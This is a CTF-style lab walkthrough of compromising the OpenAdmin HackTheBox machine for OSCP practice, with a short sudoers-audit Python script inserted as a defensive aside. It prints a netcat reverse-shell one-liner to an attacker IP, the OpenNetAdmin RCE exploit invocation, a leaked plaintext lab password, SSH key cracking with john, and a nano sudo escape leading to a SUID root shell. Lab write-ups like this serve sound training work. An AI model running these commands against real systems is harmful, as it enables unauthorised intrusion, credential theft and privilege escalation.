Follow along in my OSCP journey; this is target 14 of TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.171
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt to finish.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
| 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%),
Web
We start with the web server
Let’s look for hidden directories
gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
HINT
It looks like all these 3 endpoints are just templates but one has a clear interesting thing to it…
.
.
.
.
We can see the login feature from /music, which sends us to /ona.
If we check the menu for the about section
We find the software we’re looking for
Let’s see if it’s vulnerable.
I checked these exploits but also looked for any GitHub PoCs that would save me some time.
We read the doc, check if the version we have is actually vulnerable and then run the exploit
python3 ona-rce.py check http://openadmin.htb/ona/
python3 ona-rce.py exploit http://openadmin.htb/ona/
Jackpot, let’s get a reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.22 4444 >/tmp/f
Time for some shell upgrade 😉
python3 -c 'import pty; pty.spawn("/bin/bash")'
HINT
Obviously we’re trying to priv esc, but we’re the www-data user. Let’s do some digging and see if we can find something; config files are usually quite juicy.
.
.
.
.
If you dig enough
We also need to find what users we can try this against, we got jimmy and joanna.
cat /etc/passwd
We know the server runs ssh, let’s try that and it works with jimmy!
jimmy:n1nj4W4rri0R!
ssh jimmy@10.10.10.171
We are in, but it seems we still don’t have the user we need, since there is no user flag in jimmy’s home.
Let’s run some scripts to get a better idea of what’s going on on this machine.
Enumeration scripts
This is where we upload our linpeas, LinEnum and Exploit Suggester.
On our attacking machine
We start by setting our Simple Python HTTP Server
sudo python -m SimpleHTTPServer 80
On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.
cd /tmp/
wget http://10.10.14.22/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
It seems like both users are part of the internal group, but we still don’t know what the internal group is for …
We might have found what it relates to, there is an internal web app based on the apache config file
Nice we find where it’s running
Let’s look at the app folder /var/www/internal
What is this app
cat *.php
We have 2 interesting things:
It seems we have a hash for some password that gives a session as jimmy; not sure if that will get us anything.
But then we have this which seems like it would reveal joanna’s private SSH key
The only issue is that we can’t run this ourselves …
HINT
How could we grab this with the server running it …
.
.
.
.
As we saw in the config file, the app is running locally on port 52846, let’s curl it and see
Hell yeah, let’s connect as joanna
vi priv_key_joanna
chmod 400 priv_key_joanna
ssh joanna@10.10.10.171 -i priv_key_joanna
There is a passphrase, let’s crack it
ssh2john priv_key_joanna > priv_key_joanna.hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt priv_key_joanna.hash
Let’s try the SSH login again with the cracked passphrase, let’s go!
Grab the user flag.
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db password or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The classic sudoers permission does the trick.
Let’s check GTFOBins
sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
For ^R and ^X it’s actually Ctrl + R then Ctrl + X
Let’s actually get a proper root shell
cp /bin/bash /tmp && chmod +s /tmp/bash #inside the nano window
exit
/tmp/bash -p # -p keeps the setuid (root) effective privileges instead of dropping them
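A defender-side check for the sudoers weakness this section abuses: the rule grants an editor (nano), and editors can spawn a shell, so the rule is effectively full root. This Python audit is an added example, not code from the box or the walkthrough; it parses sudoers-style rules and flags commands whose binary is a known shell-escape program. The sudoers sample and the binary list are constructed for the example.

```python
import os
import re
import shlex

# Shell-escape-capable binaries (editors, pagers, interpreters); constructed, non-exhaustive.
SHELL_ESCAPE_BINARIES = {"nano", "vi", "vim", "less", "more", "man", "awk",
                         "find", "perl", "python", "python3", "env", "bash", "sh"}

# user  host=(runas) [TAG:] command[, command ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")

# Constructed sample; not the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
jimmy   ALL=(root) /sbin/reboot
"""

def parse_sudoers(text):
    """Split user-specification lines into one dict per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False  # tags persist across later commands on the same line
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            while (tag := re.match(r"^([A-Z]+):\s*", cmd)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag.group(1), nopasswd)
                cmd = cmd[tag.end():]
            rules.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                          "nopasswd": nopasswd, "command": cmd})
    return rules

def audit_sudoers(text):
    """Return the rules whose command is a known shell-escape binary."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["command"] == "ALL":
            continue  # unrestricted sudo is a policy choice, flagged elsewhere
        binary = os.path.basename(shlex.split(rule["command"])[0])
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append({**rule, "binary": binary})
    return findings
```

Run `audit_sudoers(open("/etc/sudoers").read())` as root on a host to list the rules that need tightening (a wrapper script or an editor with a restricted command instead of nano).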
What did I learn?
I don’t feel like we’ve learned a lot from this one, I feel like it was good practice but there wasn’t anything new that we hadn’t seen before.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.